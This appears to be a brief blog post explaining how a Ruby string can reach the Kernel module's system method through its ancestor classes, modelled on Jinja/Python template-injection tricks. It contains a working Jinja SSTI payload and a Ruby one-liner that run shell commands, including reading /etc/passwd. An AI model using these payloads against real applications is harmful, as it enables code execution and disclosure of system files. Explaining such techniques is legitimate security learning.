Using Ruby ancestors to Execute Code via the String class

tldr/oneliner

ruby -e '"".class.ancestors[3].system("cat /etc/passwd")'

Why?

So I was doing a bit of reading on SSTI, specifically that of Jinja/python which looks like this:

{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

For an explanation on how these work in python, I recommend checking out this writeup. Essentially, it made me wonder if you could do the same thing in ruby, and you definitely can (at least the accessing other methods part). No pwnz yet from me (though I can’t be the first to think of this, so it may be a nothingburger, or just a cool trick)

How it works

In ruby, you would start by delcaring a string:

somestring = "a string";

This would create an object from the String class. Thus, it would have access to all the methods of the String class. It also has some ancestor classes. You can access these like so:

somestring = "a string";
puts somestring.class.ancestors;

When you run that, you should see the output:

String
Comparable
Object
Kernel
BasicObject

This is an array of ancestor methods/classes of the String class. Thus, you can access them by index!

somestring = "a string";
puts somestring.class.ancestors[3];

When you run that, you should see the output:

Kernel

We are now accessing the Kernel module, which has some pretty interesting methods… The most interesting to me is the system method. Using this method, you can execute arbitrary shell commands.

somestring = "a string";
somestring.class.ancestors[3].system("cat /etc/passwd");

PoC

So, just a fun learning experience for me on how you can access things in unique ways in Ruby!

• 2021 2
• 2020 4